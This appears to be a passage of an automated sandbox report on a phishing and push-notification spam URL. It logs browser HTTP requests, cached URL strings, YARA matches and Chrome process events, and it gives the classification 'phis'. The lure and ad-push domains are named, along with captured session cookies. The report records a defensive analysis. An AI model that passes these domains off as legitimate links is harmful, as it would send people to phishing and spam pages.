              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.phpUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /people/4.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /people/2.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /assets/images/state-farm-drake-2021.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /people/1.jpg HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /utils/banners/images/2023-months/2023-11.png?v=1 HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /javascripts/service_worker.js?v1 HTTP/1.1Host: pushlite.neptuneadspush.comConnection: keep-aliveCache-Control: max-age=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sofa.thriveuniversehq.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.ico HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T4Ff3c4fF5lNSMx&MD=h18rKTBt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /s3/terms/terms.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sofa.thriveuniversehq.com/s3/terms/terms.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/service_worker.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42If-None-Match: W/"56-6089030eb3a5a-gzip"If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
              Source: global trafficHTTP traffic detected: GET /s3/terms/terms.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/service_worker.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42If-None-Match: W/"56-6089030eb3a5a-gzip"If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
              Source: global trafficHTTP traffic detected: GET /s3/terms/terms.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/service_worker.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42If-None-Match: W/"56-6089030eb3a5a-gzip"If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
              Source: global trafficHTTP traffic detected: GET /s3/terms/terms.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/service_worker.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42If-None-Match: W/"56-6089030eb3a5a-gzip"If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T4Ff3c4fF5lNSMx&MD=h18rKTBt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /s3/terms/terms.php HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
              Source: global trafficHTTP traffic detected: GET /service_worker.js HTTP/1.1Host: sofa.thriveuniversehq.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sofa.thriveuniversehq.com/service_worker.jsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42If-None-Match: W/"56-6089030eb3a5a-gzip"If-Modified-Since: Wed, 25 Oct 2023 20:20:49 GMT
              Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000061077E5FEE HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
              Source: global trafficHTTP traffic detected: GET /aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4= HTTP/1.1Host: svylst.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /js/ads.js HTTP/1.1Host: svylst.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: svylst.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://svylst.com/aff_c?offer_id=437&aff_id=1189&aff_sub=statefarm2&aff_sub2=a0e14b7d50354470b5133d0848e58a95&aff_sub3=704753&aff_sub4=Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: C=848bd2316dc3abc1c9b4aad2b173f936
              Source: chromecache_129.2.dr, chromecache_119.2.drString found in binary or memory: http://getbootstrap.com)
              Source: chromecache_125.2.drString found in binary or memory: http://www.loc.gov/copyright
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAUi-qJCY.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u8w4BMUTPHjxsAXC-q.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwaPGR_p.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwiPGQ.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_FQft1dw.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI3wi_Gwft.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_FQft1dw.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6u_w4BMUTPHjxsI5wq_Gwft.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2)
              Source: chromecache_112.2.drString found in binary or memory: https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjxAwXjeu.woff2)
              Source: chromecache_128.2.drString found in binary or memory: https://github.com/hgoebl/mobile-detect.js
              Source: chromecache_119.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
              Source: chromecache_100.2.drString found in binary or memory: https://pushlite.neptuneadspush.com
              Source: chromecache_108.2.drString found in binary or memory: https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v1
              Source: chromecache_94.2.drString found in binary or memory: https://www.govwlfeloony.com/2FRNJG5BQ/GZHBQPR/
              Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
              Source: unknownHTTPS traffic detected: 2.22.76.127:443 -> 192.168.2.5:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.22.76.127:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49762 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.5:49781 version: TLS 1.2

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: Yara matchFile source: 3.5.pages.csv, type: HTML
              Source: Yara matchFile source: 3.3.pages.csv, type: HTML
              Source: Yara matchFile source: 3.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.2.pages.csv, type: HTML
              Source: Yara matchFile source: 3.6.pages.csv, type: HTML
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_6128_1043036991Jump to behavior
              Source: classification engineClassification label: mal72.phis.win@26/47@37/15
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2220,i,6617707891209174409,3735623123366737918,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://storage.googleapis.com/bdlinkmanager/TSTATTFDYHS_UJG.html
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2220,i,6617707891209174409,3735623123366737918,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: agree
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Accept
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: agree
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
